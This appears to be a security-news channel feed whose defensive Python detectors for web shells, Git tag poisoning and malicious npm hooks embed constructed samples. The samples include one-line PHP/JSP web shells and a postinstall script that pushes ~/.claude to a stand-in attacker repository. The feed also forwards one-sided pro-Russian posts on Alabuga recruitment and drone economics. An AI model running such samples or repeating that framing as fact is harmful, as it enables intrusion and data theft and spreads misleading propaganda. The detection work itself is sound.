🔍 KnowledgeDeliver flaw exploited as a zero-day to install web shells
Attackers are leveraging a zero-day in the KnowledgeDeliver learning management system to deploy web shells on vulnerable servers, enabling unauthorized remote access and control.
Operationally, organizations with internet-facing LMS deployments should map exposed instances, retain and review logs, and inspect web roots for unfamiliar scripts while restricting external access (e.g., via WAF or VPN). Web shell footholds enable command execution, lateral movement, and data theft, making rapid containment, credential hygiene, and segmentation reviews priority actions until hardening is complete.
🛰️ Open sources - closed narratives
@sitreports
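Added example, not code from the source report or the vendor: a Python triage script for the "inspect web roots for unfamiliar scripts" step above. It scores files on the two things a web shell cannot avoid (taking request input and executing it) plus the decoders and high-entropy blobs usually wrapped around the payload, and can restrict a live scan to files changed after the last known-good deploy. Paths, file names and file contents in the sample are constructed.

```python
"""Added example: web-root triage for web-shell indicators.

Heuristic, not a signature: a web shell needs a way to take attacker input
and a way to execute it, often wrapped in base64/gzinflate to dodge grep.
Paths, file names and contents below are constructed for illustration.
"""
import math
import os
import re
from dataclasses import dataclass, field

# Ways attacker-controlled input enters a PHP/JSP/ASP.NET page.
INPUT_SOURCES = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b|request\.getParameter\(|Request\.(?:Form|QueryString)",
    re.I,
)
# Ways that input gets executed.
EXEC_SINKS = re.compile(
    r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)\s*\("
    r"|Runtime\.getRuntime\(\)\.exec|ProcessStartInfo|Process\.Start\(",
    re.I,
)
# Runtime decoders typically used to hide the payload from plain string search.
DECODERS = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)
# Long runs of base64 alphabet; checked against entropy to skip obvious filler.
BLOB = re.compile(r"[A-Za-z0-9+/=]{120,}")


def shannon_entropy(s: str) -> float:
    """Bits per character; base64 of compressed/encrypted data sits well above 4."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)


def assess(path: str, content: str) -> Finding:
    """Score one file; 3 or more means 'pull it for review' at the default threshold."""
    f = Finding(path)
    has_input = bool(INPUT_SOURCES.search(content))
    has_sink = bool(EXEC_SINKS.search(content))
    if has_input and has_sink:
        f.score += 3
        f.reasons.append("request input reaches an exec/eval sink")
    elif has_sink:
        f.score += 1
        f.reasons.append("exec/eval sink present")
    if DECODERS.search(content):
        f.score += 1
        f.reasons.append("runtime decoder (base64_decode/gzinflate/...)")
    for m in BLOB.finditer(content):
        if shannon_entropy(m.group()) > 4.5:
            f.score += 2
            f.reasons.append("high-entropy encoded blob")
            break
    return f


def triage(files: dict, threshold: int = 3) -> list:
    """files: {path: content}. Returns findings at or above threshold, worst first."""
    hits = [assess(p, c) for p, c in files.items()]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


def scan_webroot(root: str, newer_than=None, threshold: int = 3,
                 exts=(".php", ".phtml", ".jsp", ".jspx", ".aspx", ".ashx", ".asmx")) -> list:
    """Walk a real web root. newer_than (epoch seconds) limits the scan to files
    changed after the last known-good deploy, usually the best first filter."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if not n.lower().endswith(exts):
                continue
            p = os.path.join(dirpath, n)
            if newer_than is not None and os.path.getmtime(p) < newer_than:
                continue
            try:
                with open(p, encoding="utf-8", errors="replace") as fh:
                    files[p] = fh.read()
            except OSError:
                continue
    return triage(files, threshold)


# Constructed sample "web root": two benign files and two shell-like drops.
SAMPLE_FILES = {
    "/var/www/lms/index.php": "<?php require 'bootstrap.php'; $app->run(); ?>",
    "/var/www/lms/lib/report.php": "<?php $d = file_get_contents('r.json'); echo json_encode($d); ?>",
    "/var/www/lms/uploads/cache.php": "<?php @eval(base64_decode($_POST['c'])); ?>",
    "/var/www/lms/tmp/x.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
}

if __name__ == "__main__":
    for hit in triage(SAMPLE_FILES):
        print(f"{hit.score}  {hit.path}  ({'; '.join(hit.reasons)})")
```

Run `scan_webroot("/var/www/lms", newer_than=<deploy epoch>)` on the real host; anything that scores is a candidate for acquisition and hashing, not for deletion, until the entry point is understood.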
📡 Malware Found in Laravel-Lang Composer Packages After Git Tag Poisoning Attack
Attackers injected malware into four Laravel-Lang Composer packages by rewriting hundreds of Git tags, using a tag-poisoning technique. Numerous Laravel apps may be exposed.
This is a software supply-chain breach via version metadata. Prioritize audits for altered tag history, pin to commit hashes, verify signatures, and roll back affected builds. Review CI caches and watch for unexpected package updates.
🛰️ Open sources - closed narratives
@sitreports
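Added example, not the project's or Composer's own code: a Python check for the "audit altered tag history" and "pin to commit hashes" advice above. It records the tag-to-commit mapping a trusted build resolved, parses what `git ls-remote --tags` returns today, reports tags that now point elsewhere, and cross-checks a composer.lock entry against the live tag. The package name, repository URL and all hashes are constructed (hashes are sha1 of a label, not real commits).

```python
"""Added example: detecting a rewritten Git tag before it reaches a build.

A tag is a mutable pointer; Composer and most lock files record the commit a tag
resolved to at install time. Record that mapping once from a trusted state, then
compare it against what the remote serves now. Repository URL, package name and
all hashes below are constructed (hashes are sha1 of a label, not real commits).
"""
import hashlib
import re
import subprocess

LS_REMOTE_LINE = re.compile(r"^([0-9a-f]{40})\s+refs/tags/(\S+)$")


def sha(label: str) -> str:
    """Stand-in for a commit id so the sample data is self-consistent."""
    return hashlib.sha1(label.encode()).hexdigest()


def parse_ls_remote(text: str) -> dict:
    """Map tag name -> commit id from `git ls-remote --tags` output.
    Annotated tags appear twice: the tag object, then the peeled 'tag^{}' line
    that names the commit; the peeled value is the one a checkout lands on."""
    tags = {}
    for line in text.splitlines():
        m = LS_REMOTE_LINE.match(line.strip())
        if not m:
            continue
        sha_hex, ref = m.groups()
        if ref.endswith("^{}"):
            tags[ref[:-3]] = sha_hex
        else:
            tags.setdefault(ref, sha_hex)
    return tags


def fetch_tags(repo_url: str) -> dict:
    """Live variant: ask the remote without cloning it."""
    out = subprocess.run(["git", "ls-remote", "--tags", repo_url],
                         check=True, capture_output=True, text=True).stdout
    return parse_ls_remote(out)


def diff_tags(baseline: dict, current: dict) -> dict:
    """Tags whose commit changed are the tag-poisoning signal; new tags are
    normal releases and deserve a glance; deleted tags break reproducibility."""
    moved = {t: (baseline[t], current[t]) for t in sorted(baseline)
             if t in current and baseline[t] != current[t]}
    return {
        "moved": moved,
        "removed": sorted(set(baseline) - set(current)),
        "added": sorted(set(current) - set(baseline)),
    }


def check_lock(lock: dict, current_tags_by_pkg: dict) -> list:
    """Cross-check composer.lock: the locked source.reference for a package
    installed from tag X must equal the commit tag X resolves to right now."""
    findings = []
    for pkg in lock.get("packages", []):
        version = pkg.get("version")
        locked_ref = (pkg.get("source") or {}).get("reference")
        now = current_tags_by_pkg.get(pkg.get("name"), {}).get(version)
        if locked_ref and now and locked_ref != now:
            findings.append((pkg["name"], version, locked_ref, now))
    return findings


# Constructed data: a baseline recorded at the last trusted build...
PKG = "vendor/example-lang"  # hypothetical package name
BASELINE = {"v15.3.0": sha("v15.3.0 original"), "v15.4.0": sha("v15.4.0 original")}
# ...and what the remote answers today: v15.4.0 is annotated and now peels to a
# different commit, and a new v15.5.0 exists.
CURRENT_LS_REMOTE = "\n".join([
    f"{sha('v15.3.0 original')}\trefs/tags/v15.3.0",
    f"{sha('tag object v15.4.0')}\trefs/tags/v15.4.0",
    f"{sha('v15.4.0 rewritten')}\trefs/tags/v15.4.0^{{}}",
    f"{sha('v15.5.0 release')}\trefs/tags/v15.5.0",
])
LOCK = {"packages": [{
    "name": PKG, "version": "v15.4.0",
    "source": {"type": "git", "url": "https://example.invalid/vendor/example-lang.git",
               "reference": sha("v15.4.0 original")},
}]}

if __name__ == "__main__":
    current = parse_ls_remote(CURRENT_LS_REMOTE)
    print(diff_tags(BASELINE, current))
    print(check_lock(LOCK, {PKG: current}))
```

In CI, capture the baseline with `git ls-remote --tags` at release time and fail the pipeline on any `moved` entry; where a fixed commit is required, Composer accepts `"vendor/package": "dev-main#<commit>"` style constraints, which bypass tag resolution entirely.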
⚡ Microsoft Patches SharePoint RCE Flaw CVE-2026-45659 Across Server Versions
Microsoft has released security updates for SharePoint Server, addressing a remote code execution vulnerability tracked as CVE-2026-45659 (CVSS 8.8). Fixes apply across supported server versions, closing a high-severity path to arbitrary code execution.
On‑prem SharePoint admins should fast‑track these patches, prioritizing internet-facing servers. Validate update success, review external access routes and service account scopes, and watch for anomalous activity to contain RCE exposure.
🛰️ Open sources - closed narratives
@sitreports
🔍 Critical Memcached SASL Flaw Lets Attackers Infer Usernames
A critical vulnerability in Memcached allows attackers to determine which usernames exist in SASL-enabled deployments. The flaw enables identification of valid accounts without verifying passwords.
Operationally, exposure of confirmed usernames lowers barriers for credential stuffing, brute-force attempts, and targeted phishing against services relying on SASL. Internet-exposed and multi-tenant environments are most at risk, as pre-validating accounts streamlines follow-on intrusion and complicates detection.
🛰️ Open sources - closed narratives
@sitreports
📡 Charter confirms data breach after ShinyHunters extortion threat
U.S. telecom Charter Communications has confirmed a data breach following an extortion threat by the ShinyHunters group to leak stolen data unless a ransom is paid.
Confirmation signals adversary access and a shift from intrusion to pressure operations. This raises risk of phishing using breach themes, credential reuse attempts, and closer regulatory attention. Organizations should review vendor exposure, tighten access controls, and prepare customer communications while monitoring for ShinyHunters-branded leak channels.
🛰️ Open sources - closed narratives
@sitreports
🤖 Microsoft Defender can now automatically isolate hacked endpoints
Microsoft is testing a Microsoft Defender for Endpoint feature that automatically isolates compromised devices to hinder lateral movement. It severs network access while keeping management channels live for investigation and recovery.
This compresses response time and shifts containment from manual playbooks to policy. Teams should validate coverage on critical assets, tune isolation thresholds, and define override paths to limit disruption.
🛰️ Open sources - closed narratives
@sitreports
📡 Air Force looks to accelerate F-15 EW upgrades at new ‘Speedline’
The Air Force Life Cycle Management Center has opened a dedicated facility, the Speedline, to accelerate installation of modern electronic warfare and survivability upgrades on F-15E Strike Eagles.
Accelerated retrofits cut depot time, raise availability, and field upgraded jets sooner. A single line standardizes configurations and training baselines, bolstering survivability and mission endurance in contested airspace.
🛰️ Open sources - closed narratives
@sitreports
🔍 Banned Russian Submunitions Found After Mali's Military Announces Airstrikes
Unexploded banned Russian submunitions were identified after Mali's military announced airstrikes, linking the discovery to the period immediately following declared operations.
Operationally, the find indicates cluster-type ordnance in the strike area, elevating contamination and casualty risks and requiring clearance. It also intensifies scrutiny of munition supply, strike records, and preserved evidence for attribution and compliance.
🛰️ Open sources - closed narratives
@sitreports
📡 Canada's Telesat eyes secure Italian satellite connectivity contract, sources say
Canada's Telesat is pursuing a contract to provide secure satellite connectivity for Italy, with discussions reported to be underway.
A deal would signal Italy’s intent to harden national communications and broaden procurement options via commercial satellite services, placing a Canadian operator in a sensitive European role and shaping interoperability, resilience, and supplier diversification in government networks.
🛰️ Open sources - closed narratives
@sitreports
🔍 The LA Metro Attack Wasn't Hacktivism. It Was a State Operation With a Costume On.
A new assessment states the LA Metro attack was not a hacktivist action but a state-run operation using a hacktivist façade.
Operationally, this highlights how state actors exploit activist branding to gain deniability, complicate attribution, and shape public perception. For defenders of critical transit systems, it raises the bar for threat validation, incident communications, and response calibration when "hacktivism" may mask state direction.
🛰️ Open sources - closed narratives
@sitreports
🔍 Glassworm botnet disrupted after resilient C2 infrastructure takedown
The Glassworm botnet has been disrupted following the takedown of a resilient command-and-control infrastructure. The action interrupts control pathways, degrading coordination across infected hosts.
Operationally, removing core C2 nodes constrains tasking and update propagation, increasing fragmentation and creating a short window for remediation and telemetry collection. Defenders should audit endpoints, purge persistence, and tighten egress controls while monitoring for residual traffic.
🛰️ Open sources - closed narratives
@sitreports
📡 Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users
Active Grandoreiro banking malware and BTMOB RAT campaigns are targeting Windows and Android users across Europe and Latin America in 2026, elevating banking-malware risk for consumers and enterprises alike.
Operationally, cross-platform reach complicates defense and widens credential-theft risk across mixed fleets. Financial services and mobile-centric teams should tighten endpoints, boost anti-fraud monitoring, and rehearse rapid isolation.
🛰️ Open sources - closed narratives
@sitreports
🔍 Malicious npm Package Stole Files From Claude AI User Directory via GitHub
A malicious npm package stole files from a Claude AI user directory and moved them to GitHub. The case spotlights an npm supply-chain vector targeting local AI data.
Operational significance: developer machines that use Claude alongside GitHub-linked workflows are at risk when dependencies turn rogue. Reduce exposure by pinning and auditing packages, constraining filesystem and token scopes, and monitoring unexpected Git actions or file exfiltration.
🛰️ Open sources - closed narratives
@sitreports
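Added example, not code from the source report or from npm: a Python audit of install-time hooks, which is where a rogue dependency gets to run with the developer's filesystem, tokens and git credentials. It reads each package.json for lifecycle scripts, follows `node <file>` to the script actually executed, and flags behaviour a helper library has no reason to show (reading the home directory, touching credential or AI-tool folders, calling out to the network, driving git). Package names, script bodies and the remote URL are constructed.

```python
"""Added example: auditing npm install hooks for host-level data theft.

Scans package.json lifecycle scripts, follows `node <file>` to the script it
runs, and flags patterns a language pack or helper library should not need.
Package names, file contents and the remote URL below are constructed.
"""
import json
import os
import re

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")

SUSPICIOUS = [
    (re.compile(r"os\.homedir\(\)|\$HOME\b|%USERPROFILE%|(?:^|[\s'\"`(])~/"),
     "touches the user home directory"),
    (re.compile(r"\.(?:claude|ssh|npmrc|aws|git-credentials|config/gh)\b"),
     "references a credential or AI-tool directory"),
    (re.compile(r"\bcurl\b|\bwget\b|https?://[^\s'\"`]+"),
     "reaches out to the network"),
    (re.compile(r"\bgit\b[^;&|\n]*\b(?:push|remote|clone)\b|api\.github\.com"),
     "drives git/GitHub from an install hook"),
    (re.compile(r"\bnode\s+-e\s|\beval\(|child_process|Buffer\.from\([^)]*['\"]base64['\"]\)"),
     "spawns processes or executes decoded code"),
]
NODE_SCRIPT = re.compile(r"\bnode\s+([\w./-]+\.[cm]?js)\b")


def audit_package(name: str, manifest: dict, files: dict) -> list:
    """manifest: parsed package.json; files: {relative path: content} shipped with it."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # The hook line is often innocuous ("node setup.js"); inspect the target too.
        blobs = [(f"scripts.{hook}", cmd)]
        for target in NODE_SCRIPT.findall(cmd):
            body = files.get(target) or files.get(target.lstrip("./"))
            if body is not None:
                blobs.append((target, body))
        for where, text in blobs:
            for rx, why in SUSPICIOUS:
                if rx.search(text):
                    findings.append({"package": name, "hook": hook, "where": where, "why": why})
    return findings


def audit_node_modules(root: str) -> list:
    """Walk a real node_modules tree; each directory holding a package.json is
    audited with the JS files it ships (nested node_modules are skipped here
    because the outer walk reaches them as packages in their own right)."""
    findings = []
    for dirpath, _, names in os.walk(root):
        if "package.json" not in names:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue
        files = {}
        for sub, subdirs, subnames in os.walk(dirpath):
            subdirs[:] = [d for d in subdirs if d != "node_modules"]
            for n in subnames:
                if n.endswith((".js", ".cjs", ".mjs")):
                    p = os.path.join(sub, n)
                    try:
                        with open(p, encoding="utf-8", errors="replace") as fh:
                            files[os.path.relpath(p, dirpath)] = fh.read()
                    except OSError:
                        pass
        findings += audit_package(manifest.get("name", dirpath), manifest, files)
    return findings


# Constructed packages: two benign, one with a postinstall that drains ~/.claude to a remote.
SAMPLE_PACKAGES = {
    "tiny-pad": ({"name": "tiny-pad", "scripts": {"test": "node test.js"}}, {}),
    "native-thing": ({"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}}, {}),
    "color-helper": (
        {"name": "color-helper", "scripts": {"postinstall": "node setup.js"}},
        {"setup.js": (
            "const os = require('os'), path = require('path'), cp = require('child_process');\n"
            "const dir = path.join(os.homedir(), '.claude');\n"
            "cp.execSync(`git -C ${dir} init && git -C ${dir} add -A && "
            "git -C ${dir} push https://example.invalid/attacker/drop.git HEAD:main`);\n"
        )},
    ),
}


def audit_samples() -> list:
    out = []
    for name, (manifest, files) in SAMPLE_PACKAGES.items():
        out += audit_package(name, manifest, files)
    return out


if __name__ == "__main__":
    for f in audit_samples():
        print(f"{f['package']}: {f['hook']} via {f['where']}: {f['why']}")
```

Run the audit before hooks ever fire: `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) installs without executing lifecycle scripts, after which `audit_node_modules("node_modules")` can be reviewed and only the packages that genuinely need a build step get their scripts run.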
🤖 GPU mining malware spreads via SEO poisoning, AI chatbots
Actors are pushing GPU mining malware through SEO poisoning and AI chatbot suggestions, funneling users to attacker-run sites.
Operationally, the search-and-chat vector widens delivery beyond email, heightening cryptojacking exposure for GPU-capable endpoints and developer machines. Treat chatbot links as untrusted, tighten web filtering on search-driven downloads, and monitor anomalous GPU use.
🛰️ Open sources - closed narratives
@sitreports
⚡ CERT-In proposes 12-hour patching for AI-assisted attacks
India’s national incident response agency CERT-In calls for a 12-hour patching window to address AI-assisted attacks, urging swift mitigation.
A 12-hour target compresses response cycles, pushing patch orchestration, asset prioritization, and containment to first-line tasks. Pre-stage critical updates, streamline approvals, and automate detection-to-remediation to limit exposure as AI speeds discovery and exploitation.
🛰️ Open sources - closed narratives
@sitreports
Forwarded from Rybar in English
Healthy human migration: the example of the Alabuga Special Economic Zone
Russia's migration policy tends to face persistent and active criticism. And let's be honest, in most cases it's justified. However, there are plenty of examples of positive labor migration as well – take the "Alabuga-Start" program for attracting and Russifying female migrants from Africa.
We've already told you about the useful experience of such a policy, which made it possible to quickly fill the labor shortage in not particularly popular regions, and about how the West tried to stretch the truth, accusing Alabuga's leadership of recruiting people for the SMO.
#Africa #multiculturalism #Russia
🤖 SOCOM seeks autonomous warfare proving ground
U.S. Special Operations Command (SOCOM) is seeking to establish a dedicated proving ground for autonomous warfare capabilities. The move aims to provide a centralized venue for structured testing, evaluation, and training.
Operationally, a single site would standardize trials, safety gates, and performance metrics for human‑machine teaming, improving interoperability and shortening the path from prototypes to deployable capability. Consolidated test data would also support requirements definition, doctrine updates, and risk management across components.
🛰️ Open sources - closed narratives
@sitreports
When Cost Ratios Do the Talking
The price tag makes the picture even more brutal. A single Gepard with ammunition, overhaul and logistics easily runs into tens of millions of dollars; a Geran‑2 that destroys it costs in the range of 30–70 thousand dollars.
Every successful hit turns a highly expensive Western air‑defense asset into scrap metal using a relatively cheap loitering munition. The cost‑effectiveness ratio is clearly skewed, and not in favor of NATO hardware.
This is why Russia can afford to use Gerans not only against fixed infrastructure, but also against mobile, defended targets like air‑defense systems. Losing a few drones along the way is acceptable when the exchange rate is one Gepard per several “flying mopeds”.
For Western taxpayers, the equation looks much darker. Year by year, they pay for boutique systems that are traded away against mass‑produced munitions in a game where economics slowly grind down Ukraine’s air‑defense potential.
@sitreports
📡 Troops’ phones leaked location data to foreign adversaries
Location data from troops' personal phones leaked to foreign adversaries, exposing positions and movements that should never have left personal devices.
This exposure enables mapping of unit patterns, correlating movements with operations, and increasing risks from targeting, interception, and coercion. Mitigation hinges on strict device policies, hardened geolocation settings, minimized app permissions, and clear separation of personal electronics from mission areas.
🛰️ Open sources - closed narratives
@sitreports
🤖 GreyVibe hackers use ChatGPT, Gemini to power cyberattacks
GreyVibe hackers are leveraging ChatGPT and Gemini to drive offensive operations, signaling that mainstream AI assistants are now embedded in active cyberattack workflows.
Operationally, adversary access to public LLMs compresses timelines and raises output quality at scale. Defenders should pivot toward behavior-led detection, monitor automation and access patterns around AI services, and treat polished content as routine rather than exceptional.
🛰️ Open sources - closed narratives
@sitreports